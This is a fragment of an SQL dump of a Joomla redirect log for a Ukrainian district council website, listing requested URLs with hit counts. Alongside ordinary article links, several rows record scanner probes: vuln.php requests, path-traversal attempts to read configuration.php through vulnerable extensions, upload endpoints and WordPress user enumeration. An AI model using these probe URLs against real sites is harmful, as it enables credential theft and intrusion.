00:00:00',301),(32719,'https://www.malyn-rayrada.gov.ua/index.php/1670-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-informue',NULL,'','',21,0,'2018-11-15 18:49:18','0000-00-00 00:00:00',301),(32720,'https://www.malyn-rayrada.gov.ua/index.php/1560-dosit-vdalo-vistupili-nashi-bortsi-vilnogo-stilyu',NULL,'','',18,0,'2018-11-15 19:13:33','0000-00-00 00:00:00',301),(32721,'https://www.malyn-rayrada.gov.ua/index.php/1530-vidbulas-9-pozachergova-sesiya-rajonnoji-radi',NULL,'','',13,0,'2018-11-15 19:20:09','0000-00-00 00:00:00',301),(32722,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1626-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2017-rotsi',NULL,'','',6,0,'2018-11-15 19:55:20','0000-00-00 00:00:00',301),(32723,'https://www.malyn-rayrada.gov.ua/index.php/1652-ogoloshennya-pro-orendu-majna',NULL,'','',13,0,'2018-11-15 20:20:30','0000-00-00 00:00:00',301),(32724,'https://www.malyn-rayrada.gov.ua/index.php/1511-gorinska-silska-rada-informue-shchodo-zatverdzhennya-podatkiv-i-zboriv',NULL,'','',6,0,'2018-11-15 22:43:23','0000-00-00 00:00:00',301),(32725,'https://www.malyn-rayrada.gov.ua/index.php/1518-ksaverivska-silska-rada-informue',NULL,'','',6,0,'2018-11-15 22:45:31','0000-00-00 00:00:00',301),(32726,'https://www.malyn-rayrada.gov.ua/index.php/1334-pro-sklikannya-4-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-11-15 22:57:37','0000-00-00 00:00:00',301),(32727,'https://www.malyn-rayrada.gov.ua/index.php/1525-z-dnem-derzhavnogo-prapora-ukrajini',NULL,'','',8,0,'2018-11-15 23:30:39','0000-00-00 00:00:00',301),(32728,'https://www.malyn-rayrada.gov.ua/index.php/1716-osobistij-prijom-gromadyan-p-v-dzyublikom-24-kvitnya-2017-roku',NULL,'','',6,0,'2018-11-15 23:36:16','0000-00-00 00:00:00',301),(32729,'https://www.malyn-rayrada.gov.ua/index.php/1717-novini-iz-sportivnikh-zmagan',NULL,'','',13,0,'2018-11-16 00:07:08','0000-00-00 00:00:00',301),(32730,'https://malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',34,0,'2018-11-16 00:45:43','0000-00-00 00:00:00',301),(32731,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/1436-informuyut-silski-ta-selishchni-radi',NULL,'','',5,0,'2018-11-16 00:48:29','0000-00-00 00:00:00',301),(32732,'https://www.malyn-rayrada.gov.ua/index.php/1698-proponuemo-nayavne-vilne-nerukhome-majno-shcho-perebuvae-u-spilnij-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu-yake-na-danij-chas-ne-vikoristovuetsya-ta-mozhe-buti-nadano-v-orendu',NULL,'','',9,0,'2018-11-16 00:49:03','0000-00-00 00:00:00',301),(32733,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1598-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',5,0,'2018-11-16 00:59:32','0000-00-00 00:00:00',301),(32734,'https://www.malyn-rayrada.gov.ua/index.php/1129-z-dnem-konstitutsiji-ukrajini',NULL,'','',5,0,'2018-11-16 01:05:12','0000-00-00 00:00:00',301),(32735,'https://www.malyn-rayrada.gov.ua/index.php/1009-do-vidoma-deputativ-malinskoji-rajonnoji-radi',NULL,'','',6,0,'2018-11-16 01:09:42','0000-00-00 00:00:00',301),(32736,'https://www.malyn-rayrada.gov.ua/index.php/1888-do-pensioneriv',NULL,'','',6,0,'2018-11-16 01:48:53','0000-00-00 00:00:00',301),(32737,'https://www.malyn-rayrada.gov.ua/index.php/1637-pro-osoblivosti-viplati-pensij-za-sichen-2017-roku',NULL,'','',18,0,'2018-11-16 01:57:12','0000-00-00 00:00:00',301),(32738,'https://www.malyn-rayrada.gov.ua/attachments/article/1795/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-16 05:37:18','0000-00-00 00:00:00',301),(32739,'https://www.malyn-rayrada.gov.ua/index.php/1544-uvaga-zasterezhennya',NULL,'','',24,0,'2018-11-16 10:18:06','0000-00-00 00:00:00',301),(32740,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu',NULL,'','',13,0,'2018-11-16 11:27:55','0000-00-00 00:00:00',301),(32741,'https://www.malyn-rayrada.gov.ua/attachments/article/1577/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  11 ð¿ð¾ð·ð°ñ‡ðµñ€ð³ð¾ð²ð° ñ ðµñ ñ–ñ 7.pdf',NULL,'','',2,0,'2018-11-16 18:30:50','0000-00-00 00:00:00',301),(32742,'https://www.malyn-rayrada.gov.ua/attachments/article/1431/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-17 18:25:44','0000-00-00 00:00:00',301),(32743,'https://malyn-rayrada.gov.ua/index.php/1526-sogodni-ukrajintsi-svyatkuyut-25-tu-richnitsyu-nezalezhnosti',NULL,'','',29,0,'2018-11-17 19:53:35','0000-00-00 00:00:00',301),(32744,'https://malyn-rayrada.gov.ua/index.php/1670-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-11-17 19:54:26','0000-00-00 00:00:00',301),(32745,'https://malyn-rayrada.gov.ua/admin/index.php',NULL,'https://google.com','',14,0,'2018-11-18 03:42:58','0000-00-00 00:00:00',301),(32746,'https://malyn-rayrada.gov.ua/index.php/1587-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-3',NULL,'','',37,0,'2018-11-18 03:46:14','0000-00-00 00:00:00',301),(32747,'https://malyn-rayrada.gov.ua/index.php/1670-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-informue',NULL,'','',53,0,'2018-11-18 03:46:32','0000-00-00 00:00:00',301),(32748,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1897-pro-khid-vikonannya-rajonnoji-programi-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki',NULL,'','',6,0,'2018-11-18 03:50:29','0000-00-00 00:00:00',301),(32749,'https://www.malyn-rayrada.gov.ua/attachments/article/1784/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',3,0,'2018-11-18 05:37:43','0000-00-00 00:00:00',301),(32750,'https://malyn-rayrada.gov.ua/attachments/article/1577/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  11 ð¿ð¾ð·ð°ñ‡ðµñ€ð³ð¾ð²ð° ñ ðµñ ñ–ñ 7.pdf',NULL,'','',9,0,'2018-11-18 05:51:18','0000-00-00 00:00:00',301),(32751,'https://www.malyn-rayrada.gov.ua/attachments/article/1444/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ _130516.pdf',NULL,'','',6,0,'2018-11-18 06:45:17','0000-00-00 00:00:00',301),(32752,'https://www.malyn-rayrada.gov.ua/attachments/article/2066/ð“ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',3,0,'2018-11-18 07:53:41','0000-00-00 00:00:00',301),(32753,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',6,0,'2018-11-18 22:31:27','0000-00-00 00:00:00',301),(32754,'https://malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',39,0,'2018-11-19 01:32:48','0000-00-00 00:00:00',301),(32755,'https://malyn-rayrada.gov.ua/wp-json/wp/v2/users/',NULL,'','',5,0,'2018-11-19 15:13:56','0000-00-00 00:00:00',301),(32756,'https://malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 1.pdf',NULL,'','',2,0,'2018-11-19 17:30:17','0000-00-00 00:00:00',301),(32757,'https://www.malyn-rayrada.gov.ua/attachments/article/2060/ð¿ð¸ñ‚ð°ð½ð½ñ  ð¢ð¾ð¼ð¾ñ ñƒ.pdf',NULL,'','',3,0,'2018-11-19 17:34:06','0000-00-00 00:00:00',301),(32758,'https://www.malyn-rayrada.gov.ua/attachments/article/1614/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',10,0,'2018-11-19 18:18:25','0000-00-00 00:00:00',301),(32759,'https://malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',2,0,'2018-11-19 19:12:15','0000-00-00 00:00:00',301),(32760,'https://malyn-rayrada.gov.ua/attachments/article/1711/ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð° ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',2,0,'2018-11-19 19:17:56','0000-00-00 00:00:00',301),(32761,'https://malyn-rayrada.gov.ua/attachments/article/1706/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð°.pdf',NULL,'','',2,0,'2018-11-19 19:20:46','0000-00-00 00:00:00',301),(32762,'https://malyn-rayrada.gov.ua/attachments/article/1696/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð½2.pdf',NULL,'','',2,0,'2018-11-19 19:23:51','0000-00-00 00:00:00',301),(32763,'https://malyn-rayrada.gov.ua/attachments/article/1696/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð½1.pdf',NULL,'','',2,0,'2018-11-19 20:12:17','0000-00-00 00:00:00',301),(32764,'https://www.malyn-rayrada.gov.ua/attachments/article/1838/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-20 05:31:45','0000-00-00 00:00:00',301),(32765,'https://malyn-rayrada.gov.ua/attachments/article/1795/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-20 06:57:11','0000-00-00 00:00:00',301),(32766,'https://www.malyn-rayrada.gov.ua/index.php/1779-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-18-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-11-20 07:27:21','0000-00-00 00:00:00',301),(32767,'https://malyn-rayrada.gov.ua/attachments/article/1914/ð ð‘ðš.pdf',NULL,'','',2,0,'2018-11-21 05:50:58','0000-00-00 00:00:00',301),(32768,'https://malyn-rayrada.gov.ua/attachments/article/1914/ð¦ð ð‘.pdf',NULL,'','',2,0,'2018-11-21 05:58:51','0000-00-00 00:00:00',301),(32769,'https://www.malyn-rayrada.gov.ua/index.php/1651-informatsiya-shchodo-nadkhodzhennya-dokhodiv-v-rozrizi-rajoniv-oblasti-za-2016-rik',NULL,'','',14,0,'2018-11-21 07:19:25','0000-00-00 00:00:00',301),(32770,'https://malyn-rayrada.gov.ua/attachments/article/1919/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ  22 ñ ðµñ ñ–ñ  02.02.2018.pdf',NULL,'','',2,0,'2018-11-21 07:24:32','0000-00-00 00:00:00',301),(32771,'https://www.malyn-rayrada.gov.ua/attachments/article/1402/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  25031016.pdf',NULL,'','',3,0,'2018-11-21 07:25:30','0000-00-00 00:00:00',301),(32772,'https://www.malyn-rayrada.gov.ua/images/vuln2.php',NULL,'','',1,0,'2018-11-21 13:25:13','0000-00-00 00:00:00',301),(32773,'https://www.malyn-rayrada.gov.ua/tmp/vuln2.php',NULL,'','',1,0,'2018-11-21 13:25:15','0000-00-00 00:00:00',301),(32774,'https://www.malyn-rayrada.gov.ua/images/vuln.php',NULL,'','',2,0,'2018-11-21 13:25:17','0000-00-00 00:00:00',301),(32775,'https://www.malyn-rayrada.gov.ua/tmp/vuln.php',NULL,'','',2,0,'2018-11-21 13:25:26','0000-00-00 00:00:00',301),(32776,'https://www.malyn-rayrada.gov.ua/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',3,0,'2018-11-21 13:25:40','0000-00-00 00:00:00',301),(32777,'https://www.malyn-rayrada.gov.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',2,0,'2018-11-21 13:25:55','0000-00-00 00:00:00',301),(32778,'https://www.malyn-rayrada.gov.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',2,0,'2018-11-21 13:25:57','0000-00-00 00:00:00',301),(32779,'https://www.malyn-rayrada.gov.ua/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',3,0,'2018-11-21 13:25:59','0000-00-00 00:00:00',301),(32780,'https://www.malyn-rayrada.gov.ua/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',2,0,'2018-11-21 13:26:07','0000-00-00 00:00:00',301),(32781,'https://www.malyn-rayrada.gov.ua/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',2,0,'2018-11-21 13:26:13','0000-00-00 00:00:00',301),(32782,'https://www.malyn-rayrada.gov.ua/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',2,0,'2018-11-21 13:26:17','0000-00-00 00:00:00',301),(32783,'https://www.malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',2,0,'2018-11-21 13:26:21','0000-00-00 00:00:00',301),(32784,'https://www.malyn-rayrada.gov.ua/components/com_sexycontactform/fileupload/',NULL,'','',2,0,'2018-11-21 13:26:22','0000-00-00 00:00:00',301),(32785,'https://malyn-rayrada.gov.ua/index.php/1562-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi-2?layout=default&print=1&tmpl=component',NULL,'','',1,0,'2018-11-21 15:40:35','0000-00-00 00:00:00',301),(32786,'https://malyn-rayrada.gov.ua/attachments/article/1583/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  12 ð¿ð¾ð·ð°ñ‡ðµñ€ð³ð¾ð²ð° ñ ðµñ ñ–ñ 7.pdf',NULL,'','',2,0,'2018-11-22 05:17:11','0000-00-00 00:00:00',301),(32787,'https://malyn-rayrada.gov.ua/attachments/article/1702/ñ€ðµð·ñƒð»ñœñ‚ð°ñ‚ð¸ 22032017.pdf',NULL,'','',2,0,'2018-11-22 05:31:40','0000-00-00 00:00:00',301),(32788,'https://malyn-rayrada.gov.ua/attachments/article/1402/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  25031016.pdf',NULL,'','',3,0,'2018-11-22 06:32:16','0000-00-00 00:00:00',301),(32789,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1744-pro-zvernennya-shchodo-zberezhennya-lisiv',NULL,'','',8,0,'2018-11-22 08:03:53','0000-00-00 00:00:00',301),(32790,'https://www.malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',6,0,'2018-11-22 09:22:32','0000-00-00 00:00:00',301),(32791,'https://www.malyn-rayrada.gov.ua/index.php/1526-sogodni-ukrajintsi-svyatkuyut-25-tu-richnitsyu-nezalezhnosti',NULL,'','',16,0,'2018-11-22 09:59:24','0000-00-00 00:00:00',301),(32792,'https://www.malyn-rayrada.gov.ua/index.php/1403-sportivni-novini',NULL,'','',6,0,'2018-11-22 11:34:46','0000-00-00 00:00:00',301),(32793,'https://www.malyn-rayrada.gov.ua/index.php/1016-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-povidomlyae-platnikiv',NULL,'','',6,0,'2018-11-22 12:01:24','0000-00-00 00:00:00',301),(32794,'https://malyn-rayrada.gov.ua/index.php/1471-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue',NULL,'http://malyn-rayrada.gov.ua/index.php/1471-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue','',46,0,'2018-11-22 13:13:32','0000-00-00 00:00:00',301),(32795,'https://www.malyn-rayrada.gov.ua/index.php/810-centrviborchkom-obrobiv-100-protokoliv-za',NULL,'','',5,0,'2018-11-22 14:21:54','0000-00-00 00:00:00',301),(32796,'https://www.malyn-rayrada.gov.ua/index.php/986-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue',NULL,'','',5,0,'2018-11-22 14:33:40','0000-00-00 00:00:00',301),(32797,'https://www.malyn-rayrada.gov.ua/index.php/894-pro-posilennya-vidpovidalnosti-za-porushennya-viborchikh-prav-gromadyan',NULL,'','',5,0,'2018-11-22 14:52:25','0000-00-00 00:00:00',301),(32798,'https://www.malyn-rayrada.gov.ua/index.php/1533-ogoloshennya-pro-shchodo-orendi-komunalnogo-majna',NULL,'','',6,0,'2018-11-22 15:08:37','0000-00-00 00:00:00',301),(32799,'https://www.malyn-rayrada.gov.ua/index.php/1981-za-kozhnoyu-khustkoyu-zhittya-zhinki?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-11-22 15:12:56','0000-00-00 00:00:00',301),(32800,'https://www.malyn-rayrada.gov.ua/index.php/994-do-uvagi-platnikiv-fiksovanogo-silskogospodarskogo-podatku',NULL,'','',5,0,'2018-11-22 17:14:33','0000-00-00 00:00:00',301),(32801,'https://www.malyn-rayrada.gov.ua/index.php/653-svjato-jakogo-chekali-dva-roki-prijshlo-do-ditok',NULL,'','',5,0,'2018-11-22 17:58:12','0000-00-00 00:00:00',301),(32802,'https://malyn-rayrada.gov.ua/attachments/article/1531/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  9 ñ ðµñ ñ–ñ .pdf',NULL,'','',5,0,'2018-11-22 18:21:50','0000-00-00 00:00:00',301),(32803,'https://www.malyn-rayrada.gov.ua/index.php/974-shchodo-pensijnogo-zabezpechennya-osib-yaki-pereselilisya-z-avtonomnoji-respubliki-krim-ta-m-sevastopolya',NULL,'','',5,0,'2018-11-22 18:26:56','0000-00-00 00:00:00',301),(32804,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1483-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'','',6,0,'2018-11-22 21:58:13','0000-00-00 00:00:00',301),(32805,'https://www.malyn-rayrada.gov.ua/index.php/988-minsotspolitiki-mistsevi-organi-vladi-sami-virishuvatimut-yak-krashche-organizuvati-kharchuvannya-ditej-chornobiltsiv',NULL,'','',5,0,'2018-11-22 21:59:24','0000-00-00 00:00:00',301),(32806,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki',NULL,'','',5,0,'2018-11-23 01:01:00','0000-00-00 00:00:00',301),(32807,'https://www.malyn-rayrada.gov.ua/index.php/1679-ogoloshennya-shchodo-komunalnogo-majna',NULL,'','',18,0,'2018-11-23 01:58:05','0000-00-00 00:00:00',301),(32808,'https://www.malyn-rayrada.gov.ua/index.php/1791-pro-sklikannya-19-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',6,0,'2018-11-23 02:52:22','0000-00-00 00:00:00',301),(32809,'https://www.malyn-rayrada.gov.ua/index.php/1281-pidvishchennya-pensij-invalidam-iii-grupi-vnaslidok-zagalnogo-zakhvoryuvannya-invalidam-z-ditinstva-ta-dityam-invalidam',NULL,'','',6,0,'2018-11-23 03:10:38','0000-00-00 00:00:00',301),(32810,'https://www.malyn-rayrada.gov.ua/index.php/1091-informatsiya-shchodo-pensijnoji-reformi',NULL,'','',6,0,'2018-11-23 05:36:40','0000-00-00 00:00:00',301),(32811,'https://malyn-rayrada.gov.ua/index.php/1440-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'http://malyn-rayrada.gov.ua/index.php/1440-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi','',20,0,'2018-11-23 08:40:49','0000-00-00 00:00:00',301),(32812,'https://www.malyn-rayrada.gov.ua/index.php/1535-v-likarni-trivae-zagotivlya-ovochiv?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-11-27 00:27:28','0000-00-00 00:00:00',301),(32813,'https://www.malyn-rayrada.gov.ua/index.php/1639-zvernennya-upravlinnya-sb-ukrajini-do-zhiteliv-ta-gostej-zhitomira-i-oblasti',NULL,'','',19,0,'2018-11-27 00:27:31','0000-00-00 00:00:00',301),(32814,'https://www.malyn-rayrada.gov.ua/index.php/1217-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi',NULL,'','',5,0,'2018-11-27 04:02:37','0000-00-00 00:00:00',301),(32815,'https://www.malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva',NULL,'','',5,0,'2018-11-27 09:22:25','0000-00-00 00:00:00',301),(32816,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1724-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',5,0,'2018-11-27 15:20:14','0000-00-00 00:00:00',301),(32817,'https://malyn-rayrada.gov.ua/attachments/article/1506/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  8 ñ ðµñ ñ–ñ .pdf',NULL,'','',2,0,'2018-11-28 05:33:24','0000-00-00 00:00:00',301),(32818,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2064-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2018-rik',NULL,'','',6,0,'2018-11-28 15:24:07','0000-00-00 00:00:00',301),(32819,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2064-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2018-rik',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2064-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2018-rik','',9,0,'2018-11-29 05:31:59','0000-00-00 00:00:00',301),(32820,'https://www.malyn-rayrada.gov.ua/index.php/1535-v-likarni-trivae-zagotivlya-ovochiv',NULL,'','',22,0,'2018-11-29 12:55:39','0000-00-00 00:00:00',301),(32821,'https://www.malyn-rayrada.gov.ua/index.php/989-indeksatsiya-normativnoji-groshovoji-otsinki-zemel',NULL,'','',5,0,'2018-11-29 13:50:09','0000-00-00 00:00:00',301),(32822,'https://www.malyn-rayrada.gov.ua/index.php/1476-vitaemo-iz-svyatom-3',NULL,'','',7,0,'2018-11-29 13:58:55','0000-00-00 00:00:00',301),(32823,'https://www.malyn-rayrada.gov.ua/index.php/1534-pro-sklikannya-10-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-11-29 14:20:19','0000-00-00 00:00:00',301),(32824,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1922-pro-zatverdzhennya-rajonnoji-programi-vidshkoduvannya-majnovoji-shkodi-zbitkiv-vlasnikam-tvarin-za-viluchene-pogoliv-ya-svinej-u-zv-yazku-zi-spalakhom-07-10-2017-roku-afrikanskoji-chumi-svinej-u-seli-golovki',NULL,'','',10,0,'2018-11-29 14:21:19','0000-00-00 00:00:00',301),(32825,'https://www.malyn-rayrada.gov.ua/index.php/1640-vitaemo-z-zhiteliv-malinshchini-z-novim-rokom-ta-rizdvom-khristovim',NULL,'','',4,0,'2018-11-29 15:35:53','0000-00-00 00:00:00',301),(32826,'https://www.malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-11-29 21:23:52','0000-00-00 00:00:00',301),(32827,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1673-pro-zakrittya-viddilennya-statsionarnogo-doglyadu-ta-vporyadkuvannya-strukturi-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',5,0,'2018-11-29 22:20:27','0000-00-00 00:00:00',301),(32828,'https://www.malyn-rayrada.gov.ua/index.php/895-pro-rozshirennya-povnovazhen-mistsevikh-rad-shchodo-upravlinnya-teritoriyami',NULL,'','',5,0,'2018-11-29 22:37:59','0000-00-00 00:00:00',301),(32829,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1750-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',5,0,'2018-11-30 02:55:35','0000-00-00 00:00:00',301),(32830,'https://www.malyn-rayrada.gov.ua/index.php/1978-dopomozhemo-oksani-gergalo?tmpl=component&print=1&layout=default',NULL,'','',4,0,'2018-11-30 03:16:42','0000-00-00 00:00:00',301),(32831,'https://www.malyn-rayrada.gov.ua/index.php/2091-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-26-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',4,0,'2018-11-30 04:12:15','0000-00-00 00:00:00',301),(32832,'https://www.malyn-rayrada.gov.ua/attachments/article/2040/ð›ñƒðºñ–ð²ñ ñœðºñ–ð¹ ñ ñ–ð»ñœñ ñœðºñ–ð¹ ñ€ð°ð´ñ– 95compressed.pdf',NULL,'','',3,0,'2018-11-30 06:57:16','0000-00-00 00:00:00',301),(32833,'https://www.malyn-rayrada.gov.ua/index.php/1471-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue',NULL,'','',5,0,'2018-11-30 06:57:27','0000-00-00 00:00:00',301),(32834,'https://www.malyn-rayrada.gov.ua/index.php/1180-do-uvagi-zhiteliv-malinshchini',NULL,'','',5,0,'2018-11-30 08:28:58','0000-00-00 00:00:00',301),(32835,'https://www.malyn-rayrada.gov.ua/index.php/942-uryad-zatverdzheno',NULL,'','',5,0,'2018-11-30 08:29:14','0000-00-00 